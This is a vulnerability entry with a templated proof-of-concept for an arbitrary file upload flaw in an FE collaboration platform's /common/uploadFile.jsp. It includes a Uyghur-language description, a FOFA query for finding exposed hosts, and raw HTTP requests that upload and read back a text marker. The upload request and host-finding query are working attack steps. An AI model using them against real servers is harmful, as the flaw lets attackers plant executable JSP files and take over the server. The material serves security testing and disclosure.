Arbitrary file upload vulnerability

چۈشەندۈرىشى

FE سودا ھەمكارلىق سۇپىسىنىڭ /common/uploadFile.jsp كۆرۈنمە يۈزىدە خالىغان ھۆججەت يوللاش يوچۇقى بار. ھۇجۇم قىلغۇچى يامان غەرەزلىك JSP ھۆججىتىنى يۈكلەپ مۇلازىمېتىردا ئىجرا قىلالايدۇ، بۇ ئارقىلىق مۇلازىمېتىرنى پۈتۈنلەي كونترول قىلالايدۇ.

fofa-query

body="FE协作"

POC

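variables:
  # Per-run random values: `rand` is the marker written into the uploaded
  # file, `fname` the basename it is uploaded under. Using fresh values each
  # run avoids collisions and stops a file left behind by an earlier run from
  # producing a false positive.
  rand: "{{rand_int(100000, 999999)}}"
  fname: "{{rand_int(100000, 999999)}}"
http:
  - raw:
      # 1. Upload a harmless text marker through the multipart `accessory`
      #    field. A .txt is used deliberately instead of the .jsp the issue
      #    permits: it proves the unrestricted write without planting an
      #    executable on the target. Nothing in this template removes the
      #    file afterwards — delete /images/upload/<fname>.txt by hand once
      #    an authorised test is finished.
      - |
        POST /common/uploadFile.jsp?action=save&savePath=/images/upload/&fileName=123.jpg&title1=%C9%CF%B4%AB%CE%C4%BC%FE&title2=%D1%A1%D4%F1%CE%C4%BC%FE&allowsize=null&extName=.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.1018.84 Safari/537.36
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary123456789
        Accept: */*

        ------WebKitFormBoundary123456789
        Content-Disposition: form-data; name="accessory"; filename="{{fname}}.txt"
        Content-Type: application/octet-stream

        test_{{rand}}
        ------WebKitFormBoundary123456789--

      # 2. Read the file back under the name supplied in the multipart part.
      - |
        GET /images/upload/{{fname}}.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.2331.38 Safari/537.36

      # 3. Also read back whatever /images/upload/<digits>.txt path the
      #    server echoed (extracted below), in case it stores the upload
      #    under a name of its own rather than the one we sent.
      - |
        GET {{file}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.2331.38 Safari/537.36

    extractors:
      # Capture the stored path from a response body for request 3. No
      # `group` is set, so the full match (including the /images/upload/
      # prefix) is what `{{file}}` expands to. The dot before `txt` is
      # escaped so the pattern cannot match e.g. `123456xtxt`.
      - type: regex
        part: body
        name: file
        internal: true
        regex:
          - '/images/upload/(\d+\.txt)'

    # Both conditions must hold on the same response: a 200 that contains
    # the exact marker we uploaded. Requiring the random marker (not just the
    # status) is what proves the write landed and is served back verbatim.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "test_{{rand}}"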